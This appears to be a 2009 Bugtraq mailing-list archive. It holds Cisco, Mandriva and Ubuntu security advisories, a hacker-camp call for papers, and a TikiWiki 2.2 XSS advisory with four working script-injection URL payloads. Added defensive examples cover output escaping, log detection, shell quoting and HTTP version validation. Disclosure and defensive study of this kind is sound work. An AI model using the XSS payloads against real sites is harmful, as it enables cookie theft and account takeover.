Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at
http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
The vulnerability in Cisco Unified Communications Manager 4.x
software versions was reported to Cisco by Olivier Grosjeanne of
Dimension Data France. The vulnerability in Cisco Unified
Communications Manager 5.x, 6.x and 7.x software versions was
reported by Oliver Dewdney of LBI.
Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
===========
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20090311-cucmpab.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
===============
+--------------------------------------------------------+
| Revision 1.0 | 2009-March-11 | Initial public release. |
+--------------------------------------------------------+
Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at:
http://www.cisco.com/go/psirt
From - Thu Mar 12 11:21:13 2009
Date: Wed, 11 Mar 2009 12:54:34 -0600
Message-Id: <200903111854.n2BIsYrt025782@www3.securityfocus.com>
From: h1kari@toorcon.org
To: bugtraq@securityfocus.com
Subject: TOORCAMP 2009 CALL FOR PARTICIPATION
TOORCAMP 2009 CALL FOR PARTICIPATION
INTRODUCTION
ToorCamp is the United States' first ever full-scale hacker camp. Modelled after the camps in Holland and Germany, ToorCamp will focus on all of the technology topics that ToorCon has become famous for but will expand out into other areas of society. ToorCamp will offer 2 days of talks on many different topics -- Security, Internet, Emerging Technologies, Hardware Hacking, and Privacy are just some of the areas we will be covering. ToorCamp will also feature 2 days of hands-on workshops on a multitude of different skills that you may have never found yourself interested in learning about before. Blacksmithing, Lock Picking, Orienteering, Logic Design, Archery -- These are just a few of the topics you can expect.
ToorCamp is run by the same group that runs ToorCon and will also be heavily supported by many other hacker conferences in the US. ToorCamp will be organized as a bunch of different campsites which will be fully run by autonomous groups. We will provide the power and internet -- you provide the rest. We're heavily encouraging groups to build structures, set up art projects, throw parties, and generally do things that will show to the world that US hackers can throw a kickass hacker camp too!
Oh, and did we mention it'll be at a Titan-1 Missile Silo? We've managed to find one of the best locations in the northwest to throw this event. We've partnered with a group of people who are currently retrofitting the Silo into an ultra-secure datacenter so internet connectivity won't be a problem. ToorCamp will be situated in central Washington roughly 3 hours driving distance from Seattle and within 15 minutes drive of a private international airport. Don't miss this once in a lifetime opportunity to make history with us and help launch the first public US hacker camp!
LOGISTICS
ToorCamp will provide many of the basic hacker camp comforts such as:
- Power
- Internet
And some of the less-essential comforts such as:
- Food
- Water
- Toilets
Some optional accessories that will be available for rental are:
- Tents
- Camping mattresses
- Sleeping bags
CAMPSITE ORGANIZER SUBMISSION INFORMATION
We're looking for campsite organizers that can help out by taking charge of parts of the camp. Campsites that have at least 10 occupants will be given a 10% discount on admission for everyone registered for the campsite. Part of being a campsite organizer is helping fellow campers get shelter, community food, throwing parties, and possibly organizing group transportation out to the camp. The 10% discount refund can be given back to the campsite organizer to help fund these types of things, can be refunded to all of the campsite inhabitants, or donated to the ToorCon Foundation. To sign up for being a campsite organizer, please fill out our signup webform at:
http://toorcamp.org/campsite-signup
PAPER SUBMISSION INFORMATION
For ToorCamp we will be having 50-minute talks on Thursday, 20-minute talks on Friday, and then hands-on workshops throughout the weekend. To submit a talk for the conference, please fill out the information below and email to cfp@toorcamp.org:
0. Name
1. Email Address
2. Mobile Phone Number
3. Brief Bio
4. Title of the Talk
5. Brief Abstract
6. Any supporting materials, links, outlines, etc
7. What talk format are you submitting for:
   0. 20-minute talk
   1. 50-minute talk
   2. 1-day workshop
   3. 2-day workshop
DISCLAIMERS
ToorCamp has full permission to record and republish any material that is presented at the conference.
REASONS TO SUBMIT A TALK
- The fame and prestige of presenting at the first public US hacker camp!
- Invitations to all of the parties and special events
- Sorry, we are not able to cover air travel expenses but we will try to provide campsite accommodations if requested
SPONSORSHIP
ToorCamp has many levels of sponsorship for companies that want to help make history. We're currently looking for sponsors for the conference and the Missile Silo owners are also looking for sponsors and potential partners to help them build out their ultra-secure datacenter. For more information on sponsorship opportunities, please email geo@toorcon.org.
REGISTRATION
Pre-registration is currently open at $150. The price will slowly increase every month until it's $350 at the gate, so don't miss out on this amazing price for 4 full days of camping, talks, workshops, and non-stop entertainment at one of the best locations in the northwest. Once you're registered you'll have access to our planning, talks, and rideshare discussion forums. To pre-register, we've set up registration on our website linked below.
http://toorcamp.org/Registration
LOCATION INFO
ToorCamp 2009
Titan-1 Missile Silo
July 2nd-5th, 2009
Moses Lake, WA
http://www.toorcamp.org
IMPORTANT DATES
March 10th, 2009 - Call for Participation Opens
April 3rd, 2009 - First Round of Registration Closes
May 1st, 2009 - Second Round of Registration Closes
May 1st, 2009 - First round of selection announced
May 15th, 2009 - Second round of selection announced
May 29th, 2009 - Call for Papers closes
June 5th, 2009 - Third Round of Registration Closes
June 5th, 2009 - Speaker & sponsor selection finalized
July 1st, 2009 - Move into ToorCamp
July 2nd, 2009 - ToorCamp 50-minute Talks
July 3rd, 2009 - ToorCamp 20-minute Talks
July 4th, 2009 - ToorCamp Workshops
July 5th, 2009 - ToorCamp Workshops
July 6th, 2009 - Move out of ToorCamp
From - Thu Mar 12 11:31:13 2009
Date: Thu, 12 Mar 2009 02:54:41 -0600
Message-Id: <200903120854.n2C8sfs8027843@www3.securityfocus.com>
From: iliz-z@yandex.rui
To: bugtraq@securityfocus.com
Subject: TikiWiki 2.2 XSS Vulnerability in URI
Application: TikiWiki
Version: 2.2 (latest)
Website: www.tikiwiki.org
Bug: Active XSS in URI
Exploitation: Remote
Date: 12 Mar 2009
Discovered by: iliz
Author: iliz
Contact: e-mail: iliz-z(at)yandex(dot)ru
Bug Description:
TikiWiki version 2.2 and later uses the URI in the HTML response body and fails to sanitize it. It is therefore prone to an Active XSS attack.
PROOF OF CONCEPT:
/tiki-galleries.php/>"><Script>alert(1)</scRipt>
/tiki-list_file_gallery.php/>"><Script>alert(2)</scRipt>
/tiki-listpages.php/>"><Script>alert(3)</scRipt>
/tiki-orphan_pages.php/>"><Script>alert(4)</scRipt>
The JavaScript code will be executed in the context of the victim's
browser; this can be exploited to steal cookies and escalate
privileges to administrator.
Tested with TikiWiki 2.2, Apache 2.2, Mozilla Firefox 3.0.6, Internet Explorer 7, Opera 9.65
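Added example, not part of the advisory and not TikiWiki code: a model of the reported flaw (request URI copied into the page unescaped) next to the escaped form, plus a log check for markup characters in the path segment after a .php script name. The link template, function names and log lines are assumptions made for illustration; only the two request paths are taken from the proof of concept above.

```python
import html
import re
from urllib.parse import unquote

# Request paths quoted from the advisory's proof of concept.
ADVISORY_PATHS = [
    '/tiki-galleries.php/>"><Script>alert(1)</scRipt>',
    '/tiki-orphan_pages.php/>"><Script>alert(4)</scRipt>',
]

# Constructed access-log lines (documentation addresses, made-up sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2009:10:00:01 +0000] "GET /tiki-listpages.php?offset=0 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [12/Mar/2009:10:00:05 +0000] "GET /tiki-galleries.php/%3E%22%3E%3CScript%3Ealert(1)%3C/scRipt%3E HTTP/1.1" 200 7301',
    '192.0.2.12 - - [12/Mar/2009:10:00:09 +0000] "GET /tiki-listpages.php/extra HTTP/1.1" 200 4100',
    '192.0.2.13 - - [12/Mar/2009:10:00:12 +0000] "GET /tiki-orphan_pages.php/%3e%22%3e%3cscript%3e HTTP/1.1" 200 3900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/\d\.\d"')
PATH_INFO_RE = re.compile(r'\.php/(?P<extra>.*)', re.IGNORECASE | re.DOTALL)
MARKUP_CHARS = frozenset('<>"\'')


def render_unescaped(request_uri):
    """Hypothetical template that copies the request URI into an attribute
    verbatim, which is the behaviour the advisory reports."""
    return '<a href="' + request_uri + '">reload</a>'


def render_escaped(request_uri):
    """Same template with the URI HTML-escaped for an attribute context."""
    return '<a href="' + html.escape(request_uri, quote=True) + '">reload</a>'


def has_markup_in_path_info(request_target):
    """True when the path segment after a .php script name carries HTML
    metacharacters, raw or percent-encoded. The query string is ignored."""
    path = request_target.split('?', 1)[0]
    match = PATH_INFO_RE.search(unquote(path))
    return bool(match) and any(ch in MARKUP_CHARS for ch in match.group('extra'))


def flag_log_lines(lines):
    """Return the request targets of log lines that match the pattern."""
    flagged = []
    for line in lines:
        request = REQUEST_RE.search(line)
        if request and has_markup_in_path_info(request.group('target')):
            flagged.append(request.group('target'))
    return flagged


if __name__ == '__main__':
    for path in ADVISORY_PATHS:
        print(render_escaped(path))
    for target in flag_log_lines(SAMPLE_LOG):
        print('review:', target)
```

Escaping at output is the fix; the log check only helps find requests worth reviewing and will miss payloads carried elsewhere in the request.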
From - Thu Mar 12 11:41:14 2009
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:072 ] perl-MDK-Common
Date: Wed, 11 Mar 2009 20:29:00 +0100
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LhU6u-0002dS-Sa@titan.mandriva.com>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2009:072
http://www.mandriva.com/security/
_______________________________________________________________________
Package : perl-MDK-Common
Date : March 10, 2009
Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0,
Multi Network Firewall 2.0
_______________________________________________________________________
Problem Description:
Some vulnerabilities were discovered and corrected in perl-MDK-Common:
The functions used to write strings into shell like configuration files
by Mandriva tools were not taking care of some special characters. This
could lead to some bugs (like wireless keys containing certain
characters not working), and privilege escalation. This update fixes
that issue by ensuring proper protection of strings.
The updated packages have been patched to correct these issues.
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2008.0:
255c507faad86d74633fea56446b9f89 2008.0/i586/perl-MDK-Common-1.2.9-1.1mdv2008.0.noarch.rpm
4f83f9416037cd3775b255511ed99aaf 2008.0/SRPMS/perl-MDK-Common-1.2.9-1.1mdv2008.0.src.rpm
Mandriva Linux 2008.0/X86_64:
6ac913c2551578cbb10713db5141ab72 2008.0/x86_64/perl-MDK-Common-1.2.9-1.1mdv2008.0.noarch.rpm
4f83f9416037cd3775b255511ed99aaf 2008.0/SRPMS/perl-MDK-Common-1.2.9-1.1mdv2008.0.src.rpm
Mandriva Linux 2008.1:
8f3509691549b62e7da2682984f4c888 2008.1/i586/perl-MDK-Common-1.2.12-1.1mdv2008.1.noarch.rpm
f1919920b9fcca35dcd0033f0a19e236 2008.1/SRPMS/perl-MDK-Common-1.2.12-1.1mdv2008.1.src.rpm
Mandriva Linux 2008.1/X86_64:
4c25f8f946005b77d7581639ca544ae8 2008.1/x86_64/perl-MDK-Common-1.2.12-1.1mdv2008.1.noarch.rpm
f1919920b9fcca35dcd0033f0a19e236 2008.1/SRPMS/perl-MDK-Common-1.2.12-1.1mdv2008.1.src.rpm
Mandriva Linux 2009.0:
31fda6d87bf3ef9dfb9d9e4919c62f75 2009.0/i586/perl-MDK-Common-1.2.14-1.1mdv2009.0.noarch.rpm
073a35460e25c90234c75a66d1779609 2009.0/SRPMS/perl-MDK-Common-1.2.14-1.1mdv2009.0.src.rpm
Mandriva Linux 2009.0/X86_64:
93b0176cd4b5856e2a02f4af15a7f002 2009.0/x86_64/perl-MDK-Common-1.2.14-1.1mdv2009.0.noarch.rpm
073a35460e25c90234c75a66d1779609 2009.0/SRPMS/perl-MDK-Common-1.2.14-1.1mdv2009.0.src.rpm
Corporate 3.0:
df26c59475110bd53b5f288f11a53d57 corporate/3.0/i586/perl-MDK-Common-1.1.11-3.1.C30mdk.i586.rpm
0d7c3fa75f2e835ab1237fda5cc10387 corporate/3.0/i586/perl-MDK-Common-devel-1.1.11-3.1.C30mdk.i586.rpm
dc24b24dbf8a233cbd10f92ab8a3f5a4 corporate/3.0/SRPMS/perl-MDK-Common-1.1.11-3.1.C30mdk.src.rpm
Corporate 3.0/X86_64:
c6c00d568f5e7f48bcf8769a75dfaef2 corporate/3.0/x86_64/perl-MDK-Common-1.1.11-3.1.C30mdk.x86_64.rpm
f16597e275371d2f40d8ec9723b6f770 corporate/3.0/x86_64/perl-MDK-Common-devel-1.1.11-3.1.C30mdk.x86_64.rpm
dc24b24dbf8a233cbd10f92ab8a3f5a4 corporate/3.0/SRPMS/perl-MDK-Common-1.1.11-3.1.C30mdk.src.rpm
Corporate 4.0:
b53e8db2c3804b36c17921bd886b2c23 corporate/4.0/i586/perl-MDK-Common-1.1.24-1.1.20060mlcs4.i586.rpm
72122ed2463be591ea5c8d3763aaac1a corporate/4.0/i586/perl-MDK-Common-devel-1.1.24-1.1.20060mlcs4.i586.rpm
97b7bbf36c56e079497bb15a38cdd06e corporate/4.0/SRPMS/perl-MDK-Common-1.1.24-1.1.20060mlcs4.src.rpm
Corporate 4.0/X86_64:
5476a172d15b9985491cee4b5ba914d4 corporate/4.0/x86_64/perl-MDK-Common-1.1.24-1.1.20060mlcs4.x86_64.rpm
ecea123e2aad11416a8abd079a5b93ec corporate/4.0/x86_64/perl-MDK-Common-devel-1.1.24-1.1.20060mlcs4.x86_64.rpm
97b7bbf36c56e079497bb15a38cdd06e corporate/4.0/SRPMS/perl-MDK-Common-1.1.24-1.1.20060mlcs4.src.rpm
Multi Network Firewall 2.0:
d1b3d790798d9252553c95e4fe1e90e9 mnf/2.0/i586/perl-MDK-Common-1.1.11-3.1.C30mdk.i586.rpm
219d2d7cf2b4c745b2952ee75a2009e1 mnf/2.0/i586/perl-MDK-Common-devel-1.1.11-3.1.C30mdk.i586.rpm
f2c76192a4d62ae3702de73abda0884e mnf/2.0/SRPMS/perl-MDK-Common-1.1.11-3.1.C30mdk.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFJt+NbmqjQ0CJFipgRAvINAKC3d7iuv+HEVUIRh2Rn8BggyZ10rACfX9f1
UXe9rhwuBhlRn6iP5nwztoE=+T8R
-----END PGP SIGNATURE-----
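Added example, not part of the advisory and not the Mandriva patch: one common way to protect a string written into a shell-style NAME=value file (single-quote wrapping), with an audit that reports values a shell would interpret instead of reading literally. The variable names, sample file and sample values are constructed; the advisory does not say which protection its fix uses.

```python
import shlex
import string

# Characters that are literal to a shell without any quoting.
SAFE = frozenset(string.ascii_letters + string.digits + "_@%+=:,./-")

# Constructed values of the kind the advisory mentions (for example a
# wireless key with special characters); none comes from the advisory.
SAMPLE_VALUES = ["plainkey", "two words", "pa$$w0rd", "it's#1", "a;b&c"]

# Constructed config file with hypothetical variable names.
SAMPLE_CONFIG = """\
# constructed sample
DEVICE=wlan0
WIFI_KEY=pa$$w0rd
ESSID='guest net'
COMMENT=office ap; floor 2
"""


def sh_single_quote(value):
    """Wrap in single quotes; an embedded ' becomes '\\'' (close the quote,
    add an escaped quote, reopen), the one character they cannot hold."""
    return "'" + value.replace("'", "'\\''") + "'"


def write_quoted(name, value):
    """Protected assignment line for a shell-style config file."""
    return name + "=" + sh_single_quote(value)


def unprotected_chars(raw):
    """Characters in a raw right-hand side that a shell would act on: anything
    outside SAFE that is neither single-quoted nor backslash-escaped.
    Double quotes are reported too, since $ and ` stay active inside them."""
    found, in_single, i = set(), False, 0
    while i < len(raw):
        ch = raw[i]
        if in_single:
            in_single = ch != "'"
        elif ch == "'":
            in_single = True
        elif ch == "\\" and i + 1 < len(raw):
            i += 1                      # the escaped character is literal
        elif ch not in SAFE:
            found.add(ch)
        i += 1
    if in_single:
        found.add("'")                  # unterminated quote
    return "".join(sorted(found))


def audit_config(text):
    """Return (line number, name, offending characters) for each assignment
    whose value is not fully protected."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or "=" not in stripped:
            continue
        name, raw = stripped.split("=", 1)
        bad = unprotected_chars(raw)
        if bad:
            findings.append((lineno, name, bad))
    return findings


if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG):
        print("unprotected value:", finding)
    for value in SAMPLE_VALUES:
        print(write_quoted("WIFI_KEY", value))
```

Python's standard library offers shlex.quote for the same purpose; the hand-written function is shown so the escaping rule is visible.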
From - Thu Mar 12 11:51:13 2009
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:073 ] sarg
Date: Wed, 11 Mar 2009 22:45:01 +0100
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LhWEX-000361-Ff@titan.mandriva.com>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2009:073
http://www.mandriva.com/security/
_______________________________________________________________________
Package : sarg
Date : March 10, 2009
Affected: 2008.0, Multi Network Firewall 2.0
_______________________________________________________________________
Problem Description:
Various stack buffer overflows were discovered and corrected in sarg:
Additionally the previous release fixed CVE-2008-1922
The updated packages have been patched to correct these issues.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1922
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2008.0:
15220d1d19df7866158faf5691091db1 2008.0/i586/sarg-2.2.5-0.3mdv2008.0.i586.rpm
e90b1965c741b0411cc26dc0a3076f43 2008.0/SRPMS/sarg-2.2.5-0.3mdv2008.0.src.rpm
Mandriva Linux 2008.0/X86_64:
72be1a3b7331854ec27678985fa11fa9 2008.0/x86_64/sarg-2.2.5-0.3mdv2008.0.x86_64.rpm
e90b1965c741b0411cc26dc0a3076f43 2008.0/SRPMS/sarg-2.2.5-0.3mdv2008.0.src.rpm
Multi Network Firewall 2.0:
a16192924303d6a30611345c0cdd5226 mnf/2.0/i586/sarg-2.2.5-0.2.M20mdk.i586.rpm
076cfa3458dbc3c71eda0ccfe948c7fb mnf/2.0/SRPMS/sarg-2.2.5-0.2.M20mdk.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFJuAW5mqjQ0CJFipgRAsT4AJ9w/38BPgfFfnwBIVKWC+Z5piSEXACeNAKl
Unu1AVagIifyvkrR/7PV/ZI=aSyT
-----END PGP SIGNATURE-----
From - Thu Mar 12 12:01:14 2009
Subject: [USN-726-1] curl vulnerability
From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Date: Tue, 03 Mar 2009 14:44:12 -0500
Message-Id: <1236109452.6589.18.camel@mdlinux.technorage.com>
Cc: full-disclosure@lists.grok.org.uk,
"bugtraq@securityfocus.com" <bugtraq@securityfocus.com>
Reply-To: ubuntu-users@lists.ubuntu.com,
Ubuntu Security <security@ubuntu.com>
===========================================================
Ubuntu Security Notice USN-726-1 March 03, 2009
curl vulnerability
CVE-2009-0037
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
libcurl3 7.15.1-1ubuntu3.1
libcurl3-gnutls 7.15.1-1ubuntu3.1
Ubuntu 7.10:
libcurl3 7.16.4-2ubuntu1.1
libcurl3-gnutls 7.16.4-2ubuntu1.1
Ubuntu 8.04 LTS:
libcurl3 7.18.0-1ubuntu2.1
libcurl3-gnutls 7.18.0-1ubuntu2.1
Ubuntu 8.10:
libcurl3 7.18.2-1ubuntu4.1
libcurl3-gnutls 7.18.2-1ubuntu4.1
In general, a standard system upgrade is sufficient to effect the
necessary changes.
Details follow:
It was discovered that curl did not enforce any restrictions when following
URL redirects. If a user or automated system were tricked into opening a URL to
an untrusted server, an attacker could use redirects to gain access to arbitrary
files. This update changes curl behavior to prevent following "file" URLs after
a redirect.
Updated packages for Ubuntu 6.06 LTS:
Updated packages for Ubuntu 7.10:
Updated packages for Ubuntu 8.04 LTS:
Updated packages for Ubuntu 8.10:
Date: Thu, 26 Feb 2009 06:28:55 -0600
From: Jamie Strandboge <jamie@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Subject: [USN-724-1] Squid vulnerability
Message-ID: <20090226122855.GD6712@severus.strandboge.com>
Cc: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
===========================================================
Ubuntu Security Notice USN-724-1 February 25, 2009
squid vulnerability
CVE-2009-0478
==========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 8.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 8.10:
squid 2.7.STABLE3-1ubuntu2.1
In general, a standard system upgrade is sufficient to effect the
necessary changes.
Details follow:
Joshua Morin, Mikko Varpiola and Jukka Taimisto discovered that Squid did
not properly validate the HTTP version when processing requests. A remote
attacker could exploit this to cause a denial of service (assertion failure).
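The failure described above is a parser reaching an assertion on input it should have rejected. As an added example (not Squid's code and not part of the advisory), here is a version check that follows the RFC 2616 grammar "HTTP/" 1*DIGIT "." 1*DIGIT and returns an error status for anything else. The function names, the three-digit bound and the policy of serving only 1.0 and 1.1 are assumptions.

```c
#include <ctype.h>
#include <string.h>

/* Result codes for this hypothetical validator (names are assumptions). */
enum ver_status { VER_OK = 0, VER_MALFORMED = 400, VER_UNSUPPORTED = 505 };

/* Parse 1..3 decimal digits and advance *p; -1 if no digit or too many. */
static int parse_num(const char **p)
{
    int n = 0, digits = 0;
    while (isdigit((unsigned char)**p)) {
        if (++digits > 3)
            return -1;           /* bounded field: no overflow, no huge values */
        n = n * 10 + (**p - '0');
        (*p)++;
    }
    return digits ? n : -1;
}

/* Validate a version token: "HTTP/" 1*DIGIT "." 1*DIGIT, nothing after it. */
enum ver_status check_http_version(const char *tok, int *major, int *minor)
{
    const char *p = tok;
    if (tok == NULL || strncmp(p, "HTTP/", 5) != 0)
        return VER_MALFORMED;
    p += 5;
    int maj = parse_num(&p);
    if (maj < 0 || *p++ != '.')
        return VER_MALFORMED;
    int min = parse_num(&p);
    if (min < 0 || *p != '\0')
        return VER_MALFORMED;    /* trailing bytes are rejected, not ignored */
    if (maj != 1 || min > 1)
        return VER_UNSUPPORTED;  /* policy assumption: only 1.0 and 1.1 served */
    *major = maj;
    *minor = min;
    return VER_OK;
}

/* Validate the third token of "METHOD SP URI SP VERSION" (CRLF already stripped). */
enum ver_status check_request_line(const char *line)
{
    const char *sp1 = line ? strchr(line, ' ') : NULL;
    const char *sp2 = sp1 ? strchr(sp1 + 1, ' ') : NULL;
    int maj, min;
    if (sp2 == NULL)
        return VER_MALFORMED;
    return check_http_version(sp2 + 1, &maj, &min);
}
```

Every rejection path returns a status the caller can map to an HTTP error response, so a malformed version ends one request instead of the whole process.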
Updated packages for Ubuntu 8.10: